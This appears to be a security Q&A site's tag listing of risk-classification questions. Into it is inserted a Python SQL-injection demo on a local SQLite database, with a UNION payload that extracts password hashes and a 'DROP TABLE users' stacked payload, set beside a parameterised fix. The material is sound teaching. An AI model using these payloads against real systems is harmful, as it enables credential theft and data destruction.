Questions tagged [risk-classification]
The risk-classification tag has no usage guidance.
10 questions
0 votes, 0 answers, 65 views
Is there an established way to classify network services by risk level?
I noticed that I seem to think of network services in three categories wrt the risk of exposing one to the internet (or a hostile network):
"Low risk" services are extensively hardened. If ...
0 votes, 1 answer, 213 views
Cyber resilience scoring
What would be good assessments of cyber resilience? I imagined something like a score on different topics e.g.:
Data Protection: HIGH RISK
Malware defense: MEDIUM RISK
Application/System Life Cycle: ...
1 vote, 2 answers, 208 views
How to create non-generic security requirements for an idea phase?
Our manager often asks us for a quick understanding of what the risks will be based on some idea that the department has been working on during the ideation phase (the business requirements are ...
2 votes, 1 answer, 1k views
Impact of SQL injection on SELECT statement
During a routine penetration test I encountered a possibility for SQL injection. The following criteria apply:
Microsoft SQL Server (2016);
Query has to start with SELECT;
The semicolon ; is not ...
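The constraints listed in this question (the injected text lands inside a query that must begin with SELECT, and stacked statements are not available) still leave full data disclosure on the table through a UNION. What follows is an added example, not code from the question or its answers. It uses an in-memory SQLite database as a stand-in for the Microsoft SQL Server instance the question mentions (an assumption: the `'`-break, `UNION SELECT` and `--` comment used here behave the same on both engines), and the `products`/`users` tables and their contents are constructed sample data.

```python
import sqlite3

# Constructed sample data, not taken from the original question.
PRODUCTS = [("widget", "tools", 9.99), ("gizmo", "tools", 19.99), ("plush", "toys", 4.50)]
USERS = [("alice", "fake-hash-for-alice"), ("bob", "fake-hash-for-bob")]

# Attacker-controlled inputs. Neither contains a semicolon; the query still starts with SELECT.
UNION_PAYLOAD = "x' UNION SELECT username, password_hash FROM users--"
STACKED_PAYLOAD = "x'; DROP TABLE users--"


def setup_db():
    """Build the in-memory stand-in database (assumption: SQLite in place of MSSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(name TEXT, category TEXT, price REAL)")
    conn.execute("CREATE TABLE users(username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_search(conn, category):
    """Deliberately vulnerable: user input is concatenated into the WHERE clause."""
    query = f"SELECT name, price FROM products WHERE category = '{category}'"
    return conn.execute(query).fetchall()


def safe_search(conn, category):
    """Hardened form: the same query with a bound parameter, so input is never parsed as SQL."""
    query = "SELECT name, price FROM products WHERE category = ?"
    return conn.execute(query, (category,)).fetchall()


def stacked_query_rejected(conn):
    """Model the 'no stacked statements' constraint: sqlite3's execute() refuses a second
    statement, so the DROP never runs. Returns True if the users table survived."""
    try:
        vulnerable_search(conn, STACKED_PAYLOAD)
    except (sqlite3.Warning, sqlite3.Error):
        pass  # the second statement was rejected by the driver
    count = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()[0]
    return count == 1


if __name__ == "__main__":
    db = setup_db()
    print("normal:", vulnerable_search(db, "tools"))
    print("union injection:", vulnerable_search(db, UNION_PAYLOAD))
    print("parameterised:", safe_search(db, UNION_PAYLOAD))
    print("stacked statement rejected:", stacked_query_rejected(db))
```

The UNION branch needs the same number of columns as the original SELECT, and on SQL Server the column types must also be compatible (SQLite lets a TEXT hash sit under a REAL column; SQL Server would raise a conversion error, so payloads there typically CAST or pick matching columns). That is why the inability to stack statements does not, on its own, lower the impact rating of a SELECT-only injection: read access to every table the application login can see is already on offer.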
1 vote, 3 answers, 3k views
Security Risk Register
Does anyone know of any good Risk Registers to start logging security risks that are found on the fly?
The problem that I am having is that we find so much in a day, things start to get lost in ...
-1 votes, 3 answers, 223 views
Should Risk Impact (not likelihood or overall risk) be quantified by the initial impact, or should you quantify by eventual (potential) impact [closed]
I am undertaking a risk assessment and trying to work out the risk impact on confidentiality if a company employee (specifically a System Administrator) steals server hardware.
On the one hand ...
3 votes, 1 answer, 665 views
CVSS Score Remote or Local Scenario
I have had to deal with a lot of CVSSv2 and CVSSv3 scores for many, many years. What has troubled me like forever is what default attack scenario shall be defined for a vulnerability. Let's take a malicious ...
10 votes, 3 answers, 386 views
Are there any Common Weakness Entries (CWEs) applicable for hardware security weaknesses?
I can't seem to find a suitable CWE for classifying hardware-specific security weaknesses. Particularly, I'm looking for a CWE that applies to power glitching or clock glitching against a ...
3 votes, 3 answers, 1k views
Risk classification of authenticated XSS
During a security test I was wondering what the risk classification would be in an authenticated XSS vulnerability. I understand that it depends on classification schemes, so the focus in this ...
2 votes, 1 answer, 1k views
Can information security risks essentially only be triaged according to the CIA triangle?
Can information security risks essentially only be triaged according to the CIA triangle (Confidentiality, Integrity and Availability) or are there other possibilities?